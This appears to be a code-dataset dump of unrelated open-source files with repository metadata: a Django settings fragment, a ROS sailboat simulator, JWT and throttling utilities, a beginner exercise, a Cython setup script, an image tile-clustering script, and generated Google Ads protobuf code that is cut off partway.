'fuel.apps.FuelConfig',
'circuit.apps.CircuitConfig',
'car.apps.CarConfig',
'session.apps.SessionConfig',
'session_type.apps.SessionTypeConfig',
'metrics.apps.MetricsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'py_blackbox_backend.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'py_blackbox_backend.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
if DEBUG:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': "live-blackbox",
'USER': 'postgres',
'PASSWORD': 'postgres',
'HOST': 'db'
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
]
| |
b0a4fdf7a72979e444fdfa623f69a8f29cd809db | 13a179f6251d8354b058ff02b3101d904b606f0b | /src/shepherd_simu/src/sailboat_sim.py | 55da970d98847cf36e6b2ca0d542b0e025b062a6 | [
"MIT"
]
| permissive | ENSTA-Bretagne-Shepherd/Shepherd-Ros-Structure | 4bb2ecb146e9fbc0897a780980634a711dc1788b | 6ce33426911fc50dfd61f165d73efe9702c2009b | refs/heads/master | 2021-01-12T08:36:38.511501 | 2017-02-22T13:20:17 | 2017-02-22T13:20:17 | 76,635,278 | 1 | 0 | null | 2017-02-10T16:13:33 | 2016-12-16T08:16:52 | CMake | UTF-8 | Python | false | false | 1,281 | py | #!/usr/bin/env python
import rospy
from models.sailboat import Sailboat
from shepherd_reg.msg import SailboatCmd
from shepherd_disp.msg import SailboatPose
from std_msgs.msg import Float64
def update_cmd(msg):
global cmd
print 'Updated cmd:', msg.rudder_angle, msg.sail_angle
cmd = [msg.rudder_angle, msg.sail_angle]
def update_wind_direction(msg):
global wind_direction
wind_direction = msg.data
def update_wind_force(msg):
global wind_force
wind_force = msg.data
rospy.init_node('sailboat_simu')
sailboat = Sailboat(theta=0.1, v=3)
# Sailboat pose publisher
pose_pub = rospy.Publisher('sailboat/pose_real', SailboatPose, queue_size=1)
# Subscribe to the command of the sailboat
sub = rospy.Subscriber('sailboat/cmd', SailboatCmd, update_cmd)
# Subscribe to the wind
rospy.Subscriber('env/wind_direction', Float64, update_wind_direction)
rospy.Subscriber('env/wind_force', Float64, update_wind_force)
# Command
cmd = [0, 0]
wind_force = 3
wind_direction = 0
# rate
rate = rospy.Rate(10)
while not rospy.is_shutdown():
sailboat.simulate(cmd, wind_force, wind_direction)
pose = SailboatPose()
pose.pose.x = sailboat.x
pose.pose.y = sailboat.y
pose.pose.theta = sailboat.theta
pose_pub.publish(pose)
rate.sleep()
| [
"[email protected]"
]
| |
3b5faf029aed4be7d85694ac734b8aed784d187a | b156aad4624ec6dbc2efcca93181bbb948d16cc6 | /utils/utils.py | c128221bb9fdc076717f2e26e232be3b58d048cc | []
| no_license | itang85/bookshop-django | d191e2af002db94073ee8c59eeb768002443958f | b136629b4e5b1dc7f0661e4b06618f31c95d7ede | refs/heads/master | 2023-03-28T02:59:06.729909 | 2021-03-05T15:41:49 | 2021-03-05T15:41:49 | 332,227,518 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,870 | py | import base64, json, re, jwt, datetime, time, hashlib, random
from calendar import timegm
# 导入谷歌验证码相关模块
# import pyotp
# 导入使用缓存的模块
# from django.core.cache import cache
from rest_framework.throttling import BaseThrottle
from django.conf import settings
from conf.area.area_list import area_dict
from utils.settings import api_settings
def jwt_payload_handler(account):
payload = {
'id': account.pk,
'exp': datetime.datetime.utcnow() + api_settings.JWT_EXPIRATION_DELTA # 过期时间
}
if api_settings.JWT_ALLOW_REFRESH:
payload['orig_iat'] = timegm(
datetime.datetime.utcnow().utctimetuple()
)
if api_settings.JWT_AUDIENCE is not None:
payload['aud'] = api_settings.JWT_AUDIENCE
if api_settings.JWT_ISSUER is not None:
payload['iss'] = api_settings.JWT_ISSUER
return payload
def jwt_get_user_id_from_payload_handler(payload):
return payload.get('id')
def jwt_encode_handler(payload):
return jwt.encode(
payload,
api_settings.JWT_PRIVATE_KEY or api_settings.JWT_SECRET_KEY,
api_settings.JWT_ALGORITHM
)
def jwt_decode_handler(token):
options = {
'verify_exp': api_settings.JWT_VERIFY_EXPIRATION,
}
return jwt.decode(
token,
api_settings.JWT_PUBLIC_KEY or api_settings.JWT_SECRET_KEY,
[api_settings.JWT_ALGORITHM],
options=options,
verify=api_settings.JWT_VERIFY,
leeway=api_settings.JWT_LEEWAY,
audience=api_settings.JWT_AUDIENCE,
issuer=api_settings.JWT_ISSUER
)
def jwt_response_payload_handler(token, user=None, request=None):
return {
'token': token
}
# 频率组件
VISIT_RECORD = {}
class VisitThrottle(BaseThrottle):
def __init__(self):
self.history = None
def allow_request(self, request, view):
remote_addr = request.META.get('HTTP_X_REAL_IP')
# print('请求的IP:',remote_addr)
ctime = time.time()
if remote_addr not in VISIT_RECORD:
VISIT_RECORD[remote_addr] = [ctime,]
return True
history = VISIT_RECORD.get(remote_addr)
self.history = history
while history and history[-1] < ctime - 60:
history.pop()
print(VISIT_RECORD)
if len(history) < 100: # 限制的频数 设置同一IP该接口一分钟内只能被访问100次
history.insert(0, ctime)
return True
else:
return False
def wait(self):
ctime = time.time()
return 60 - (ctime-self.history[-1])
def get_region_cn(code):
province = area_dict['province_list'][code[0:2] + '0000']
city = area_dict['city_list'][code[0:4] + '00']
county = area_dict['county_list'][code]
return province + '-' + city + '-' + county
| [
"[email protected]"
]
| |
55058d7c8d58c89e603d4127debeb4b8df5bd25a | 70730512e2643833e546e68761ee6cd3d7b95e1d | /01-python基础/code/day03/day02_exercise/exercise03.py | fadfaaf9e18f4ab6a6bc3a1b8aadc81dd9936e0a | []
| no_license | Yuchen1995-0315/review | 7f0b0403aea2da62566642c6797a98a0485811d1 | 502859fe11686cc59d2a6d5cc77193469997fe6a | refs/heads/master | 2020-08-26T23:16:33.193952 | 2019-10-24T00:30:32 | 2019-10-24T00:30:32 | 217,177,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | """
(扩展)在控制台中录入一个秒,计算是几小时零几分钟零几秒钟.
"""
# 10:40
total_second = int(input("请输入总秒数:"))
second = total_second % 60
hour = total_second // 60 // 60
minute = total_second // 60 % 60
# 在字符串中插入变量:
# “...x...” “..."+变量+"...”
print(str(hour) + "小时零" + str(minute) + "分钟零" + str(second) + "秒钟")
| [
"[email protected]"
]
| |
4fe27b358e04b2dd76cba83b1b138fdd6e369026 | 29fd3daff8c31764c00777e67d2cc9b3e94ba761 | /examples/ch05_examples/mandelbrot/mandelbrot/cython_pure_python/setup.py | 440f9ca05742dda490c59ab9d203bd5d6f221906 | []
| no_license | mwoinoski/crs1906 | 06a70a91fc99e2d80e2ed3cea5724afa22dce97d | 202f7cc4cae684461f1ec2c2c497ef20211b3e5e | refs/heads/master | 2023-06-23T17:13:08.163430 | 2023-06-12T21:44:39 | 2023-06-12T21:44:39 | 39,789,380 | 1 | 2 | null | 2022-01-26T20:43:18 | 2015-07-27T17:54:56 | Python | UTF-8 | Python | false | false | 424 | py | from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
# for notes on compiler flags e.g. using
# export CFLAGS=-O2
# so gcc has -O2 passed (even though it doesn't make the code faster!)
# http://docs.python.org/install/index.html
setup(
cmdclass = {'build_ext': build_ext},
ext_modules = [Extension("calculate_z", ["calculate_z.pyx"])]
)
| [
"[email protected]"
]
| |
951e54a1ed72d5527bcb0dd1b534c6ef1079a65b | 2cc84af3d2a146b4dbb04bed3cfd542fa0622489 | /image-tools/image_clustering/tile_clustering.py | 1047091f0afa7d8cb8376a27b8df124a3fda22b4 | [
"MIT"
]
| permissive | flegac/deep-experiments | e6a05b1a58eadf4c39580e95bb56d311e3dfa0ac | e1b12e724f2c8340cbe9c51396cf3f42e3b4e934 | refs/heads/master | 2020-04-09T00:20:15.132255 | 2019-10-11T16:39:47 | 2019-10-11T16:39:47 | 159,862,795 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,458 | py | import glob
import os
from typing import List, Callable
import cv2
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.colors import to_rgb
from scipy.stats import wasserstein_distance
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sklearn.pipeline import Pipeline
from image_clustering.tiler import GridTiler
from mydeep_api.tensor import Tensor
TagComputer = Callable[[Tensor], int]
HistComputer = Callable[[Tensor], Tensor]
class Params(object):
def __init__(self, bins: int = 64, pca_components: int = 64, tile_size: int = 64):
self.bins = bins
self.pca_components = pca_components
self.tiler = GridTiler(tile_size=tile_size)
def hist_computer(self, img: Tensor):
r, _ = np.histogram(img[2], bins=self.bins, range=[0, 256])
r, _ = np.histogram(img[2], bins=self.bins, range=[0, 256])
r = r / np.linalg.norm(r)
g, _ = np.histogram(img[1], bins=self.bins, range=[0, 256])
g = g / np.linalg.norm(g)
b, _ = np.histogram(img[0], bins=self.bins, range=[0, 256])
b = b / np.linalg.norm(b)
return np.hstack((r, g, b))
class ClusterTagComputer(TagComputer):
def __init__(self, path: str, hist_computer: HistComputer):
self.hist_computer = hist_computer
self.clusters = [
[hist_computer(cv2.imread(img_path)) for img_path in glob.glob('{}/{}/*.png'.format(path, _))]
for _ in os.listdir(path)
]
self.stats()
def stats(self):
for _ in self.clusters:
for c in _:
bins = np.array(range(len(c)))
prob = c / np.sum(c)
image = np.sort(np.random.choice(bins, size=128 * 128, replace=True, p=prob)).reshape((128, 128))
plt.imshow(image, 'gray')
def __call__(self, data: Tensor):
hist = self.hist_computer(data)
d2 = [min([wasserstein_distance(hist, _) for _ in c]) for c in self.clusters]
return int(np.argmin(d2))
class KmeanTagComputer(TagComputer):
def __init__(self, p: Params, images: List[str], cluster_number: int):
self.hist_computer = p.hist_computer
self.model = KMeans(n_clusters=cluster_number, n_init=20)
dataset = []
for _ in images:
img = cv2.imread(_)
boxes = GridTiler(tile_size=32).tiles(img.shape[:2])
histograms = [p.hist_computer(box.cut(img)) for box in boxes]
dataset.extend(histograms)
self.pipeline = Pipeline(steps=[
('pca', PCA(n_components=p.pca_components)),
('clustering', self.model),
])
self.pipeline.fit(dataset)
# self.stats()
def stats(self):
centers = (self.model.cluster_centers_ + 1) / 2
for c in centers:
bins = np.array(range(len(c))) * 4
prob = c / np.sum(c)
image = np.sort(np.random.choice(bins, size=128 * 128, replace=True, p=prob)).reshape((128, 128))
plt.imshow(image, 'gray')
def __call__(self, data: Tensor):
hist = self.hist_computer(data)
return self.pipeline.predict([hist])[0]
def tile_clustering(img: Tensor, tag_computer: TagComputer, tiler: GridTiler):
out = img.copy()
k = 8
for box in tiler.tiles(img.shape[:2]):
flag = tag_computer(box.cut(img))
pt1 = (box.left + k, box.top + k)
pt2 = (box.right - k, box.bottom - k)
cv2.rectangle(out, pt1, pt2, tuple(256 * _ for _ in to_rgb(COLORS[flag])), 2)
return out
COLORS = ['red', 'blue', 'green', 'white', 'yellow',
'orange', 'purple', 'cyan', 'magenta', 'gray']
P = Params(
bins=128,
pca_components=128,
tile_size=128
)
if __name__ == '__main__':
dataset = 'cs'
images = glob.glob('../tests/20190802_export_s2_it1/{}/*_?.png'.format(dataset))
model_tag_computer = KmeanTagComputer(P, images, cluster_number=4)
cluster_tag_computer = ClusterTagComputer('../image_editor/tiles', P.hist_computer)
os.makedirs(dataset, exist_ok=True)
for _ in images:
name = os.path.basename(_).replace('.tif', '')
img = cv2.imread(_)
img1 = tile_clustering(img, model_tag_computer, P.tiler)
cv2.imwrite('{}/{}_model.png'.format(dataset, name), img1)
# img2 = tile_clustering(img, cluster_tag_computer, P.tiler)
# cv2.imwrite('{}/{}_clusters.png'.format(dataset, name), img2)
| [
"[email protected]"
]
| |
4f0ef26fe165b0b46815ad51b62f6a0c0f470256 | 42c48f3178a48b4a2a0aded547770027bf976350 | /google/ads/google_ads/v5/proto/services/remarketing_action_service_pb2.py | 0495a4d9e848a5eed492faca8b8aa2397a32544c | [
"Apache-2.0"
]
| permissive | fiboknacky/google-ads-python | e989464a85f28baca1f28d133994c73759e8b4d6 | a5b6cede64f4d9912ae6ad26927a54e40448c9fe | refs/heads/master | 2021-08-07T20:18:48.618563 | 2020-12-11T09:21:29 | 2020-12-11T09:21:29 | 229,712,514 | 0 | 0 | Apache-2.0 | 2019-12-23T08:44:49 | 2019-12-23T08:44:49 | null | UTF-8 | Python | false | true | 20,741 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v5/proto/services/remarketing_action_service.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v5.proto.resources import remarketing_action_pb2 as google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from google.api import client_pb2 as google_dot_api_dot_client__pb2
from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2
from google.api import resource_pb2 as google_dot_api_dot_resource__pb2
from google.protobuf import field_mask_pb2 as google_dot_protobuf_dot_field__mask__pb2
from google.rpc import status_pb2 as google_dot_rpc_dot_status__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v5/proto/services/remarketing_action_service.proto',
package='google.ads.googleads.v5.services',
syntax='proto3',
serialized_options=b'\n$com.google.ads.googleads.v5.servicesB\035RemarketingActionServiceProtoP\001ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v5/services;services\242\002\003GAA\252\002 Google.Ads.GoogleAds.V5.Services\312\002 Google\\Ads\\GoogleAds\\V5\\Services\352\002$Google::Ads::GoogleAds::V5::Services',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\nGgoogle/ads/googleads_v5/proto/services/remarketing_action_service.proto\x12 google.ads.googleads.v5.services\x1a@google/ads/googleads_v5/proto/resources/remarketing_action.proto\x1a\x1cgoogle/api/annotations.proto\x1a\x17google/api/client.proto\x1a\x1fgoogle/api/field_behavior.proto\x1a\x19google/api/resource.proto\x1a google/protobuf/field_mask.proto\x1a\x17google/rpc/status.proto\"h\n\x1bGetRemarketingActionRequest\x12I\n\rresource_name\x18\x01 \x01(\tB2\xe0\x41\x02\xfa\x41,\n*googleads.googleapis.com/RemarketingAction\"\xc2\x01\n\x1fMutateRemarketingActionsRequest\x12\x18\n\x0b\x63ustomer_id\x18\x01 \x01(\tB\x03\xe0\x41\x02\x12U\n\noperations\x18\x02 \x03(\x0b\x32<.google.ads.googleads.v5.services.RemarketingActionOperationB\x03\xe0\x41\x02\x12\x17\n\x0fpartial_failure\x18\x03 \x01(\x08\x12\x15\n\rvalidate_only\x18\x04 \x01(\x08\"\xea\x01\n\x1aRemarketingActionOperation\x12/\n\x0bupdate_mask\x18\x04 \x01(\x0b\x32\x1a.google.protobuf.FieldMask\x12\x46\n\x06\x63reate\x18\x01 \x01(\x0b\x32\x34.google.ads.googleads.v5.resources.RemarketingActionH\x00\x12\x46\n\x06update\x18\x02 \x01(\x0b\x32\x34.google.ads.googleads.v5.resources.RemarketingActionH\x00\x42\x0b\n\toperation\"\xa7\x01\n MutateRemarketingActionsResponse\x12\x31\n\x15partial_failure_error\x18\x03 \x01(\x0b\x32\x12.google.rpc.Status\x12P\n\x07results\x18\x02 \x03(\x0b\x32?.google.ads.googleads.v5.services.MutateRemarketingActionResult\"6\n\x1dMutateRemarketingActionResult\x12\x15\n\rresource_name\x18\x01 \x01(\t2\x94\x04\n\x18RemarketingActionService\x12\xd9\x01\n\x14GetRemarketingAction\x12=.google.ads.googleads.v5.services.GetRemarketingActionRequest\x1a\x34.google.ads.googleads.v5.resources.RemarketingAction\"L\x82\xd3\xe4\x93\x02\x36\x12\x34/v5/{resource_name=customers/*/remarketingActions/*}\xda\x41\rresource_name\x12\xfe\x01\n\x18MutateRemarketingActions\x12\x41.google.ads.googleads.v5.services.MutateRemarketingActionsRequest\x1a\x42.google.ads.googleads.v5.services.MutateRemarketingActionsResponse\"[\x82\xd3\xe4\x93\x02<\"7/v5/customers/{customer_id=*}/remarketingActions:mutate:\x01*\xda\x41\x16\x63ustomer_id,operations\x1a\x1b\xca\x41\x18googleads.googleapis.comB\x84\x02\n$com.google.ads.googleads.v5.servicesB\x1dRemarketingActionServiceProtoP\x01ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v5/services;services\xa2\x02\x03GAA\xaa\x02 Google.Ads.GoogleAds.V5.Services\xca\x02 Google\\Ads\\GoogleAds\\V5\\Services\xea\x02$Google::Ads::GoogleAds::V5::Servicesb\x06proto3'
,
dependencies=[google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,google_dot_api_dot_client__pb2.DESCRIPTOR,google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,google_dot_api_dot_resource__pb2.DESCRIPTOR,google_dot_protobuf_dot_field__mask__pb2.DESCRIPTOR,google_dot_rpc_dot_status__pb2.DESCRIPTOR,])
_GETREMARKETINGACTIONREQUEST = _descriptor.Descriptor(
name='GetRemarketingActionRequest',
full_name='google.ads.googleads.v5.services.GetRemarketingActionRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v5.services.GetRemarketingActionRequest.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002\372A,\n*googleads.googleapis.com/RemarketingAction', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=349,
serialized_end=453,
)
_MUTATEREMARKETINGACTIONSREQUEST = _descriptor.Descriptor(
name='MutateRemarketingActionsRequest',
full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='customer_id', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest.customer_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='operations', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest.operations', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='partial_failure', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest.partial_failure', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='validate_only', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest.validate_only', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=456,
serialized_end=650,
)
_REMARKETINGACTIONOPERATION = _descriptor.Descriptor(
name='RemarketingActionOperation',
full_name='google.ads.googleads.v5.services.RemarketingActionOperation',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='update_mask', full_name='google.ads.googleads.v5.services.RemarketingActionOperation.update_mask', index=0,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='create', full_name='google.ads.googleads.v5.services.RemarketingActionOperation.create', index=1,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='update', full_name='google.ads.googleads.v5.services.RemarketingActionOperation.update', index=2,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='operation', full_name='google.ads.googleads.v5.services.RemarketingActionOperation.operation',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=653,
serialized_end=887,
)
_MUTATEREMARKETINGACTIONSRESPONSE = _descriptor.Descriptor(
name='MutateRemarketingActionsResponse',
full_name='google.ads.googleads.v5.services.MutateRemarketingActionsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='partial_failure_error', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsResponse.partial_failure_error', index=0,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='results', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsResponse.results', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=890,
serialized_end=1057,
)
_MUTATEREMARKETINGACTIONRESULT = _descriptor.Descriptor(
name='MutateRemarketingActionResult',
full_name='google.ads.googleads.v5.services.MutateRemarketingActionResult',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v5.services.MutateRemarketingActionResult.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1059,
serialized_end=1113,
)
_MUTATEREMARKETINGACTIONSREQUEST.fields_by_name['operations'].message_type = _REMARKETINGACTIONOPERATION
_REMARKETINGACTIONOPERATION.fields_by_name['update_mask'].message_type = google_dot_protobuf_dot_field__mask__pb2._FIELDMASK
_REMARKETINGACTIONOPERATION.fields_by_name['create'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2._REMARKETINGACTION
_REMARKETINGACTIONOPERATION.fields_by_name['update'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2._REMARKETINGACTION
_REMARKETINGACTIONOPERATION.oneofs_by_name['operation'].fields.append(
_REMARKETINGACTIONOPERATION.fields_by_name['create'])
_REMARKETINGACTIONOPERATION.fields_by_name['create'].containing_oneof = _REMARKETINGACTIONOPERATION.oneofs_by_name['operation']
_REMARKETINGACTIONOPERATION.oneofs_by_name['operation'].fields.append(
_REMARKETINGACTIONOPERATION.fields_by_name['update'])
_REMARKETINGACTIONOPERATION.fields_by_name['update'].containing_oneof = _REMARKETINGACTIONOPERATION.oneofs_by_name['operation']
_MUTATEREMARKETINGACTIONSRESPONSE.fields_by_name['partial_failure_error'].message_type = google_dot_rpc_dot_status__pb2._STATUS
_MUTATEREMARKETINGACTIONSRESPONSE.fields_by_name['results'].message_type = _MUTATEREMARKETINGACTIONRESULT
DESCRIPTOR.message_types_by_name['GetRemarketingActionRequest'] = _GETREMARKETINGACTIONREQUEST
DESCRIPTOR.message_types_by_name['MutateRemarketingActionsRequest'] = _MUTATEREMARKETINGACTIONSREQUEST
DESCRIPTOR.message_types_by_name['RemarketingActionOperation'] = _REMARKETINGACTIONOPERATION
DESCRIPTOR.message_types_by_name['MutateRemarketingActionsResponse'] = _MUTATEREMARKETINGACTIONSRESPONSE
DESCRIPTOR.message_types_by_name['MutateRemarketingActionResult'] = _MUTATEREMARKETINGACTIONRESULT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
GetRemarketingActionRequest = _reflection.GeneratedProtocolMessageType('GetRemarketingActionRequest', (_message.Message,), {
'DESCRIPTOR' : _GETREMARKETINGACTIONREQUEST,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """Request message for [RemarketingActionService.GetRemarketingAction][go
ogle.ads.googleads.v5.services.RemarketingActionService.GetRemarketing
Action].
Attributes:
resource_name:
Required. The resource name of the remarketing action to
fetch.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.GetRemarketingActionRequest)
})
_sym_db.RegisterMessage(GetRemarketingActionRequest)
MutateRemarketingActionsRequest = _reflection.GeneratedProtocolMessageType('MutateRemarketingActionsRequest', (_message.Message,), {
'DESCRIPTOR' : _MUTATEREMARKETINGACTIONSREQUEST,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """Request message for [RemarketingActionService.MutateRemarketingActions
][google.ads.googleads.v5.services.RemarketingActionService.MutateRema
rketingActions].
Attributes:
customer_id:
Required. The ID of the customer whose remarketing actions are
being modified.
operations:
Required. The list of operations to perform on individual
remarketing actions.
partial_failure:
If true, successful operations will be carried out and invalid
operations will return errors. If false, all operations will
be carried out in one transaction if and only if they are all
valid. Default is false.
validate_only:
If true, the request is validated but not executed. Only
errors are returned, not results.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.MutateRemarketingActionsRequest)
})
_sym_db.RegisterMessage(MutateRemarketingActionsRequest)
RemarketingActionOperation = _reflection.GeneratedProtocolMessageType('RemarketingActionOperation', (_message.Message,), {
'DESCRIPTOR' : _REMARKETINGACTIONOPERATION,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """A single operation (create, update) on a remarketing action.
Attributes:
update_mask:
FieldMask that determines which resource fields are modified
in an update.
operation:
The mutate operation.
create:
Create operation: No resource name is expected for the new
remarketing action.
update:
Update operation: The remarketing action is expected to have a
valid resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.RemarketingActionOperation)
})
_sym_db.RegisterMessage(RemarketingActionOperation)
MutateRemarketingActionsResponse = _reflection.GeneratedProtocolMessageType('MutateRemarketingActionsResponse', (_message.Message,), {
'DESCRIPTOR' : _MUTATEREMARKETINGACTIONSRESPONSE,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """Response message for remarketing action mutate.
Attributes:
partial_failure_error:
Errors that pertain to operation failures in the partial
failure mode. Returned only when partial\_failure = true and
all errors occur inside the operations. If any errors occur
outside the operations (e.g. auth errors), we return an RPC
level error.
results:
All results for the mutate.
""",
